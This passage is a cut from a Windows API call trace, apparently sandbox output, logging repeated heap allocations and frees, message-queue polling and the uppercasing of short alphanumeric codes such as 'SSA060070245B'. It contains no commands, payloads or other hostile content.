hHeap=0x25c0000) returned 1 [0159.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0159.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0159.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0159.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0159.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0159.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0159.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0159.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0159.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0159.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0159.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0159.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0159.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0159.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0159.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0159.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0159.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0159.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0159.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0159.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0159.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0159.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0159.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0159.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0159.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0159.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0159.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0159.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0159.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0159.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0159.252] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0159.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0159.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0159.252] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0159.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0159.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0159.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0159.252] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0159.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0159.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0159.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0159.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0159.253] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0159.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0159.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0159.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0159.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0159.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0159.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0159.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0159.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0159.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0159.253] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0159.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0159.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0159.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0159.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0159.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0159.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0159.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0159.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0159.254] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0159.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0159.254] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0159.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0159.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0159.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0159.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0159.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0159.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0159.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0159.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0159.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0159.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0159.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0159.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0159.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0159.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0159.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0159.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0159.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0159.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0159.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0159.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0159.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0159.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0159.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0159.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0159.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0159.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0159.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0159.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0159.255] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0159.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0159.255] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0159.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0159.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0159.255] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0159.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0159.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0159.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0159.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0159.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0159.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0159.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0159.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0159.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0159.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0159.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0159.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0159.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0159.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0159.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0159.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0159.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0159.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0159.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0159.256] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0159.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0159.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0159.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0159.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0159.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0159.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0159.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0159.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0159.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0159.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0159.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0159.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0159.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0159.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0159.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0159.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0159.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0159.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0159.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0159.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0159.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0159.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0159.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0159.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0159.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0159.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0159.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0159.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0159.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0159.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0159.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0159.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0159.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0159.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0159.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0159.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0159.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0159.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0159.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0159.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0159.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0159.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0159.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0159.260] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0159.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0159.260] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0159.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0159.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0159.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0159.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0159.260] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0159.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0159.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0159.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0159.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0159.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0159.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0159.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0159.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0159.260] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0159.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0159.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0159.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0159.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0159.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0159.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0159.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0159.261] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0159.261] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0159.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0159.261] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0159.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0159.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0159.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0159.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0159.261] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0159.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0159.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0159.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0159.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0159.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0159.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 